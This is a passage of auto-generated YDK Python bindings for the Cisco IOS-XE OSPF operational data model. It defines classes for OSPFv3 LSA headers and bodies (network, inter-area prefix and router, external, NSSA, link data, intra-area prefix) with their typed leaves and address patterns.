<ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value) class Header(Entity): """ Decoded OSPFv3 LSA header .. attribute:: lsa_id LSA ID **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: lsa_header LSA header **type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader>` **config**\: False .. attribute:: lsa_hdr_options OSPFv3 LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): """ LSA header .. attribute:: age LSA age **type**\: int **range:** 0..65535 **config**\: False .. attribute:: type LSA type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: adv_router LSA advertising router **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: seq_num LSA sequence number **type**\: str **config**\: False .. attribute:: checksum LSA checksum **type**\: str **config**\: False .. attribute:: length LSA length **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): """ Decoded OSPFv3 LSA body .. attribute:: network OSPFv3 network **type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network>` **config**\: False .. attribute:: prefix OSPFv3 inter area prefix **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix>` **config**\: False .. attribute:: ia_router OSPFv3 inter area router **type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter>` **config**\: False .. attribute:: lsa_external OSPFv3 LSA external **type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal>` **config**\: False .. attribute:: nssa OSPFv3 NSSA **type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa>` **config**\: False .. attribute:: link_data OSPFv3 Link data **type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData>` **config**\: False .. attribute:: ia_prefix OSPFv3 Intra area prefixes **type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix>` **config**\: False .. attribute:: lsa_flag_options LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False .. attribute:: lsa_body_flags LSA Body Flags **type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): """ OSPFv3 network .. attribute:: attached_router List of the routers attached to the network **type**\: list of int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_net_options Network LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): """ OSPFv3 inter area prefix .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: ia_prefix Inter area Prefix **type**\: str **config**\: False .. attribute:: ia_prefix_options Inter area prefix options **type**\: str **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): """ OSPFv3 inter area router .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: destination_router_id Router ID of the router being described by the LSA **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_ia_options Inter area LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): """ OSPFv3 LSA external .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): """ OSPFv3 NSSA .. attribute:: lsa_nssa_external NSSA LSA **type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): """ NSSA LSA .. attribute:: metric Metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: flags LSA Flags **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>` **config**\: False .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: external_prefix Prefix **type**\: str **config**\: False .. attribute:: external_prefix_options Prefix options **type**\: str **config**\: False .. attribute:: forwarding_address Forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: external_route_tag Route tag **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): """ LSA Flags .. attribute:: e_flag When set, the metric specified is a Type 2 external metric **type**\: bool **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): """ OSPFv3 Link data .. attribute:: rtr_priority Router priority of the interce **type**\: int **range:** 0..255 **config**\: False .. attribute:: link_local_interface_address The originating router's link\-local interface address on the link **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: lsa_id_options Link data LSA options **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): """ OSPFv3 Intra area prefixes .. attribute:: referenced_ls_type Referenced Link State type **type**\: int **range:** 0..65535 **config**\: False .. attribute:: referenced_link_state_id Referenced Link State ID **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: referenced_adv_router Referenced Advertising Router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: num_of_prefixes Number of prefixes **type**\: int **range:** 0..65535 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): 